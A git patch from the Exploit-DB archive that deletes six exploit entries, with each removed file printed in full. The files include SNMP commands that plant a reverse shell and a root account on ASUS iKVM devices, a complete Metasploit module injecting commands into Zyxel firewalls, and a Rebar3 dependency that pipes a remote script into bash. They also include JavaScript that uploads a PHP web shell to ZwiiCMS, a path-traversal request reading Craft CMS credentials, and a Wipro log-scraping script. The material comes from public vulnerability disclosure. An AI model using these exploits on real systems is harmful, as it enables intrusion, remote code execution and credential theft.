From 859e322e5cce8f24d187c20a76d9990fb1427e36 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 3 Jul 2024 00:16:27 +0000 Subject: [PATCH] DB: 2024-07-03 13 changes to exploits/shellcodes/ghdb ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit) Rebar3 3.13.2 - Command Injection Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated) Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure --- exploits/hardware/remote/52033.txt | 61 ----------- exploits/hardware/remote/52049.rb | 152 ---------------------------- exploits/multiple/webapps/52051.txt | 41 -------- exploits/php/webapps/52034.txt | 111 -------------------- exploits/php/webapps/52050.txt | 62 ------------ exploits/windows/remote/52032.py | 77 -------------- files_exploits.csv | 6 -- 7 files changed, 510 deletions(-) delete mode 100644 exploits/hardware/remote/52033.txt delete mode 100755 exploits/hardware/remote/52049.rb delete mode 100644 exploits/multiple/webapps/52051.txt delete mode 100644 exploits/php/webapps/52034.txt delete mode 100644 exploits/php/webapps/52050.txt delete mode 100755 exploits/windows/remote/52032.py diff --git a/exploits/hardware/remote/52033.txt b/exploits/hardware/remote/52033.txt deleted file mode 100644 index e683aea132..0000000000 --- a/exploits/hardware/remote/52033.txt +++ /dev/null @@ -1,61 +0,0 @@ -# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access -# Date: 2023-02-16 -# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023] -# Vendor Homepage: https://servers.asus.com/search?q=ASMB8 -# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) -# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl -# CVE: CVE-2023-26602 - -++++++++++++++++++++ -0x00 DESCRIPTION -++++++++++++++++++++ -During a recent engagement, a remote server management interface has been -discovered. Furthermore, SNMPv2 was found to be enabled, offering write -access to the private community, subsequently allowing us to introduce -SNMP arbitrary extensions to achieve RCE. -We also found a hardcoded account sysadmin:superuser by cracking the -shadow file (md5crypt) found on the system and identifed an "anonymous" -user w/ the same password, however a lock seems to be in place to prevent -using these credentials via SSH (running defshell as default shell). -+++++++++++++++ -0x01 IMPACT -+++++++++++++++ -By exploiting SNMP arbitrary extension, we are able to run any command on -the system w/ root privileges, and we are able to introduce our own user -circumventing the defshell restriction for SSH. -+++++++++++++++++++++++++++++++ -0x02 PROOF OF CONCEPT (PoC) -+++++++++++++++++++++++++++++++ -At first, we have to create required extensions on the system, e.g. via -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"' -and if everything is set, we can just run that command by -snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects -which will execute our defined command and show us its output. -+++++++++++++++++++++++++++++++ -0x03 SSH Remote Root Access -+++++++++++++++++++++++++++++++ -The identified RCE can be used to transfer a reverse tcp shell created -by msfvenom for arm little-endian, e.g. -msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin -We can now transfer the binary, adjust permissions and finally run it: -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' -Again, we have to request execution of the lines in the MIB via: -snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects -We get a reverse connection from the host, and can now act on the local system -to easily echo our own line into /etc/passwd: -echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd -By setting the standard shell to /bin/sh, we are able to get a SSH root -shell into the system, effectively circumventing the defshell restriction. -$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g -BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) -Enter 'help' for a list of built-in commands. -# uname -a -Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown -# uptime -15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 -# head -n 1 /etc/shadow -sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: ---- -#EOF \ No newline at end of file diff --git a/exploits/hardware/remote/52049.rb b/exploits/hardware/remote/52049.rb deleted file mode 100755 index 47cafd353b..0000000000 --- a/exploits/hardware/remote/52049.rb +++ /dev/null @@ -1,152 +0,0 @@ -# Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution -# Date: 2023-03-31 -# Exploit Author: sf -# Vendor Homepage: https://www.zyxel.com/ -# Software Link: https://www.zyxel.com/ -# Version: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), -# VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive) -# Tested on: Linux -# CVE : CVE-2023-28771 - - -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::Udp - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution', - 'Description' => %q{ - This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange - (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are - as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), - VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The - affected devices are vulnerable in a default configuration and command execution is with root privileges. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'sf', # MSF Exploit & Rapid7 Analysis - ], - 'References' => [ - ['CVE', '2023-28771'], - ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'], - ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls'] - ], - 'DisclosureDate' => '2023-03-31', - 'Platform' => %w[unix linux], - 'Arch' => [ARCH_CMD], - 'Privileged' => true, # Code execution as 'root' - 'DefaultOptions' => { - # We default to a meterpreter payload delivered via a fetch HTTP adapter. - # Another good payload choice is cmd/unix/reverse_bash. - 'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp', - 'FETCH_WRITABLE_DIR' => '/tmp', - 'FETCH_COMMAND' => 'CURL' - }, - 'Targets' => [ [ 'Default', {} ] ], - 'DefaultTarget' => 0, - 'Notes' => { - # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart. - 'Stability' => [CRASH_SERVICE_RESTARTS], - 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [IOC_IN_LOGS] - } - ) - ) - - register_options( - [ - Opt::RPORT(500) - ] - ) - end - - - def check - connect_udp - - # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can - # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message. - - # In a default configuration, there appears no known method to identify the platform vendor or version - # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown. - # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we - # still would not be able to identify the version number of the target service. - - ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI - ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI - ikev2_header << [0].pack('C') # Next Payload: None - 0 - ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10) - ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2 - ikev2_header << [0].pack('C') # Flags: None - 0 - ikev2_header << [0].pack('N') # ID: 0 - ikev2_header << [ikev2_header.length + 4].pack('N') # Length - - udp_sock.put(ikev2_header) - - ikev2_reply = udp_sock.get(udp_sock.def_read_timeout) - - disconnect_udp - - if !ikev2_reply.empty? && (ikev2_reply.length >= 40) && - # Ensure the response 'Initiator SPI' field is the same as the original one sent. - (ikev2_reply[0, 8] == ikev2_header[0, 8]) && - # Ensure the 'Next Payload' field is Notification (11) - (ikev2_reply[16, 1].unpack('C').first == 11 && - # Ensure the 'Exchange Type' field is Informational (5) - (ikev2_reply[18, 1].unpack('C').first == 5)) && - # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16) - (ikev2_reply[38, 2].unpack('n').first == 16) - return CheckCode::Detected('IKE detected but device vendor and service version are unknown.') - end - - CheckCode::Unknown - end - - def exploit - execute_command(payload.encoded) - end - - def execute_command(cmd) - connect_udp - - cmd_injection = "\";bash -c \"#{cmd}\";echo -n \"" - - # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the - # log file. As such the decoded value must not have any null terminator values as these will break our command - # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd - # injection payload to work as expected. - haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB' - - ikev2_payload = [0].pack('C') # Next Payload: None - 0 - ikev2_payload << [0].pack('C') # Reserved: 0 - ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data - ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1 - ikev2_payload << [0].pack('C') # SPI Size: None - 0 - ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E) - ikev2_payload << haxb48 + cmd_injection # Notification Data - - ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI - ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI - ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29) - ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20) - ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22) - ikev2_header << [8].pack('C') # Flags: Initiator - 8 - ikev2_header << [0].pack('N') # ID: 0 - ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length - - packet = ikev2_header << ikev2_payload - - udp_sock.put(packet) - - disconnect_udp - end - -end \ No newline at end of file diff --git a/exploits/multiple/webapps/52051.txt b/exploits/multiple/webapps/52051.txt deleted file mode 100644 index 2084deb10e..0000000000 --- a/exploits/multiple/webapps/52051.txt +++ /dev/null @@ -1,41 +0,0 @@ -# Exploit Title: Rebar3 3.13.2 Command Injection -# Date: 2020-06-03 -# Exploit Author: Alexey Pronin -# Vendor Homepage: https://rebar3.org -# Software Link: https://github.com/erlang/rebar3 -# Versions affected: 3.0.0-beta.3 - 3.13.2 -# Tested on: Linux -# CVE: CVE-2020-13802 - -1. Description: ----------------------- - -Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification. - -2. Proof of Concept: ----------------------- - -* Add dependency with any of the following specification: - - { - 'dephelper', ".*", { - hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", - "dephelper"} - } - - or - - { - 'poc_rebar3', ".*", { - git, "https://github.com/vulnbe/poc-rebar3.git" - } - } - -* Execute command: rebar3 clean - -References ----------------------- -* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/) -* [POC](https://github.com/vulnbe/poc-rebar3.git) -* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302) -* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802) \ No newline at end of file diff --git a/exploits/php/webapps/52034.txt b/exploits/php/webapps/52034.txt deleted file mode 100644 index cee9119053..0000000000 --- a/exploits/php/webapps/52034.txt +++ /dev/null @@ -1,111 +0,0 @@ -# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) -# Date: 2022.01.26 -# Exploit Author: Steffen Rogge -# Vendor Homepage: https://github.com/ethercreative/logs -# Software Link: https://plugins.craftcms.com/logs -# Version: <=3.0.3 -# Tested on: Linux -# CVE : CVE-2022-23409 - -product: Ethercreative Logs plugin for Craft CMS -fixed version: >=3.0.4 -impact: Medium -found: 2021-07-06 -SEC Consult Vulnerability Lab -An integrated part of SEC Consult, an Atos company -Europe | Asia | North America -https://www.sec-consult.com -======================================================================= -Vendor description: -------------------- -"A quick and dirty way to access your logs from inside the CP" -As found on the plugin store page: https://plugins.craftcms.com/logs -Active Installs 4,093 (as of 2021-07-07) -Business recommendation: ------------------------- -The vendor provides a patched version v3.0.4 which should be installed immediately. -Vulnerability overview/description: ------------------------------------ -1) Authenticated Path Traversal (CVE-2022-23409) -The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside -the backend of the CMS. As the requested logfile is not properly validated, an attacker is -able to request arbitrary files from the underlying file system with the permissions of the -web service user. -Proof of concept: ------------------ -1) Authenticated Path Traversal (CVE-2022-23409) -As the plugin is installed as an administrator of the system and the function is only accessible -after being logged in as an admin, an attacker needs to be authenticated as an administrator in -the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. -The vulnerable endpoint is provided by the plugin under the following path: -https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream -The vulnerable controller for that endpoint can be found here: -https://github.com/ethercreative/logs/blob/master/src/Controller.php -The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input -values before file content is being read by the function "file_get_contents". -public function actionStream () -{ -$logsDir = \Craft::getAlias('@storage/logs'); -$logFile = \Craft::$app->request->getParam('log'); -$currentLog = \Craft::$app->request->get('log', $logFile); -$log = file_get_contents($logsDir . '/' . $currentLog); -exit($log); -} -A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem -with rights as the user executing the web server. In most cases this will be the user "www-data". -In order to read the file ".env" or ".env.php" which contains the environment configuration and as -such also the database credentials, the following request can be used: -GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 -Connection: close -Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=; -The response then discloses the file content of the file ".env": -HTTP/1.1 200 OK -Date: Thu, 07 Jul 2021 10:08:52 GMT -Server: nginx -Content-Type: text/html; charset=UTF-8 -Expires: Thu, 19 Nov 1981 08:52:00 GMT -Cache-Control: no-store, no-cache, must-revalidate -Pragma: no-cache -Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly -Content-Length: 1600 -Connection: close -[...] -$craftEnvVars = [ -'DB_DRIVER' => 'mysql', -'DB_SERVER' => '********', -'DB_USER' => '********', -'DB_PASSWORD' => '********', -'DB_DATABASE' => '********', -'DB_SCHEMA' => 'public', -'DB_TABLE_PREFIX' => '', -'DB_PORT' => '********', -'SECURITY_KEY' => '********', -[...] -Vulnerable / tested versions: ------------------------------ -The following version has been tested which was the latest version available at the time -of the test: -* Version 3.0.3 released on November 25, 2019 -Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs -Vendor contact timeline: ------------------------- -2021-07-07: Contacting vendor through dev@ethercreative.co.uk -2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible -for any risks involved with plaintext communication -2021-07-08: Advisory was sent to vendor unencrypted -2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 -(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4) -2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation -(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4) -2022-01-24: Release of security advisory -Solution: ---------- -The vendor released a patched version 3.0.4 or higher which can be retrieved from their -website/github: -https://plugins.craftcms.com/logs -https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4 -Workaround: ------------ -Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services. \ No newline at end of file diff --git a/exploits/php/webapps/52050.txt b/exploits/php/webapps/52050.txt deleted file mode 100644 index 78f500d818..0000000000 --- a/exploits/php/webapps/52050.txt +++ /dev/null @@ -1,62 +0,0 @@ -# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated) -# Date: 03/06/2023 -# Exploit Author: Hadi Mene -# Vendor Homepage: https://zwiicms.fr/ -# Version: 12.2.04 and potentially lower versions -# Tested on: Linux -# CVE: CVE-2020-10567 -# Category: webapps - - -ZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible for -an authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution -due to a lack of extension check on the uploaded file. - -Original CVE author : hackoclipse -https://github.com/trippo/ResponsiveFilemanager/issues/600 - - -Vulnerable code (ajax_calls.php) : - -// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without being -necessarily an image - -81 case 'save_img': -82 $info = pathinfo($_POST['name']); -83 $image_data = $_POST['url']; -84 -85 if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) { -86 $image_data = substr($image_data, strpos($image_data, ',') + 1); -87 $type = strtolower($type[1]); // jpg, png, gif -88 -89 $image_data = base64_decode($image_data); - - -PoC: - -1) Login in the Administration Panel. -2) Click on the Folder icon on the top of the panel. -3) Open the Developer Tools for that page. -4) Copy,Edit and Execute the Javascript Code below . -5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND - -Javascript Code -###### - -function submitRequest() - { - var xhr = new XMLHttpRequest(); - xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true); - xhr.setRequestHeader("Accept", "*\/*"); - xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); - xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); - xhr.withCredentials = true; - var body = "url=&path=&name=shell.php"; - var aBody = new Uint8Array(body.length); - for (var i = 0; i < aBody.length; i++) - aBody[i] = body.charCodeAt(i); - xhr.send(new Blob([aBody])); - } -submitRequest(); - -###### \ No newline at end of file diff --git a/exploits/windows/remote/52032.py b/exploits/windows/remote/52032.py deleted file mode 100755 index c7107104c1..0000000000 --- a/exploits/windows/remote/52032.py +++ /dev/null @@ -1,77 +0,0 @@ -# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure -# Date: 09/08/2021 -# Exploit Author: Rizal Muhammed @ub3rsick -# Vendor Homepage: https://www.wipro.com/holmes/ -# Version: Wipro Holmes Orchestrator v20.4.1 -# Tested on: Windows -# CVE : CVE-2021-38283 - -import requests as rq -import argparse -import datetime -import os -from calendar import monthrange -from multiprocessing.dummy import Pool as ThreadPool -from functools import partial - -# Change if running on different port -port = 8001 -log_list = [ - "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt", - "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt", - "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt", - "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt", - "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt", - "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt", - "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt", - "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt", - "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt" -] - -def check_month(val): - ival = int(val) - if ival > 0 and ival < 13: - return ival - else: - raise argparse.ArgumentTypeError("%s is not a valid month" % val) - -def check_year(val): - iyear = int(val) - if iyear >= 1960 and iyear <= datetime.date.today().year: - return iyear - else: - raise argparse.ArgumentTypeError("%s is not a valid year" % val) - -def do_request(target, date, log_file): - log_url = f"http://{target}/log/{date}/{log_file}" - log_name = f"{date}_{log_file}" - print(f"[*] Requesting Log: /log/{date}/{log_file}") - resp = rq.get(log_url) - if resp.status_code == 200 and not "Wipro Ltd." in resp.text: - print(f"[+] Success: {log_url}") - with open(f"logs/{log_name}", 'w') as lf: - lf.write(resp.text) - print(f"[*] Log File Written to ./logs/{log_name}") - -def main(): - parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure", - epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick") - parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True) - parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month) - parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year) - args = parser.parse_args() - - ndays = monthrange(args.year, args.month)[1] - date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)] - target = f"{args.target_ip}:{port}" - - # Create folder "logs" to save log files, if it does not exist - if not os.path.exists("./logs"): - os.makedirs("./logs") - - for log_date in date_list: - for log_file in log_list: - do_request(target, log_date, log_file) - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 966949383a..03baae9afe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3342,7 +3342,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,, 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info 22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info -52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,, 44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb 31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,, 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,, @@ -4030,7 +4029,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,,2009-08-17,,1,OSVDB-57419,,,,, 17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",remote,hardware,,2011-05-04,2011-05-04,1,,,,,,http://www.redteam-pentesting.de/advisories/rt-sa-2011-003 24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",remote,hardware,,2004-11-22,2013-03-13,1,CVE-2004-1540;OSVDB-12108,,,,,https://www.securityfocus.com/bid/11723/info -52049,exploits/hardware/remote/52049.rb,"Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)",2024-06-14,ub3rsick,remote,hardware,,2024-06-14,2024-06-14,0,,,,,, 50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",2022-04-19,"Ahmed Alroky",remote,hardware,,2022-04-19,2022-04-19,0,CVE-2021-4039,,,,, 30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,remote,hardware,,2007-12-25,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27024/info 43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,, @@ -12209,7 +12207,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,,2019-03-21,2019-03-21,0,CVE-2019-5418,Traversal,,,, 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,,2019-05-06,2019-05-06,0,CVE-2018-20580,,,,, 48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,, -52051,exploits/multiple/webapps/52051.txt,"Rebar3 3.13.2 - Command Injection",2024-06-14,ub3rsick,webapps,multiple,,2024-06-14,2024-06-14,0,,,,,, 10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,, 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip, @@ -16518,7 +16515,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar, 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,, 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,, -52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,, 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,, 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,, 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119 @@ -34929,7 +34925,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46420,exploits/php/webapps/46420.txt,"Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting",2019-02-19,"Deyaa Muhammad",webapps,php,80,2019-02-19,2019-02-19,0,,"Cross-Site Scripting (XSS)",,,, 